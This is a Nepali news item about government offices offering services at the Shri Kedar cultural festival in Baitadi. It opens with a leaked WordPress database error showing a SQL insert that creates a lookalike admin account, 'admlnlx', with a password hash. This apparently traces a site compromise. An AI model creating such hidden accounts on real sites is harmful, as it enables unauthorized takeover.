WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqyHfXy7cDq4zkPMZrYcM95cVDTcdp.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 16:17:28', '', 'admlnlx', 'admlnlx')
बैतडी, माघ १२ –
श्रीकेदारमा यही माघ १५ गतेदेखि सञ्चालन हुन लागेको सांस्कृतिक महोत्सवमा जिल्लास्थित सम्पूर्ण सरकारी कार्यालयले सेवा दिने भएका छन् ।
श्रीकेदार सांस्कृतिक संरक्षण समाजको आयोजनामा सञ्चालन हुन लागेको सो महोत्सवमा जिल्ला प्रशासनको नागरिकता टोली, जिल्ला विकास समिति, पशुसेवा, कृषि कार्यालय, स्वास्थ्य कार्यालय, सुख्खा फलफूल विकास केन्द्र, आयुर्वेद औषधालय, जिल्ला पशुसेवा कार्यालयलगायतका सरकारी कार्यालयले सेवा उपलब्ध गराउने महोत्सवका संयोजक सुरेन्द्रप्रसाद भट्टले जानकारी दिनुभयो ।
“सरकारी सेवालाई गाउँमै पु¥याउने उद्देश्यले यस्तो कार्य गरेका हौँ,” उहाँले भन्नुभयो । सानातिना कामका लागि समेत सर्वसाधारण सदरमुकाम जानु पर्ने बाद्यता छ । जिल्ला प्रशासन कार्यालयको समन्वयमा श्रीकेदार, श्रीकोट, न्वाली, दशरथचन्द नगरपालिकाको– १२ र १३ वडामा माघ १७ र १८ गते एकीकृत घुम्ती शिविर सञ्चालन गर्न लागेको प्रमुख जिल्ला अधिकारी किशोरकुमार चौधरीले बताउनुभयो ।
स्थानीय कला संस्कृतिको जगेर्ना गर्न आयोजना गर्न गरिएको सो महोत्सवमा स्थानीय तथा राष्ट्रिय कलाकारको प्रस्तुति रहने छ । सुदूरपश्चिमको कला संस्कृतिको जगेर्ना तथा स्थानीय उत्पादन प्रवद्र्धन गर्ने उद्देश्यले सञ्चालन हुन लागेको वृहत बैतडी श्रीकेदार दोस्रो सांस्कृतिक महोत्सव तथा व्यापार मेला श्रीकेदार उच्चमाविको परिसरमा सञ्चालन हुने छ । – रासस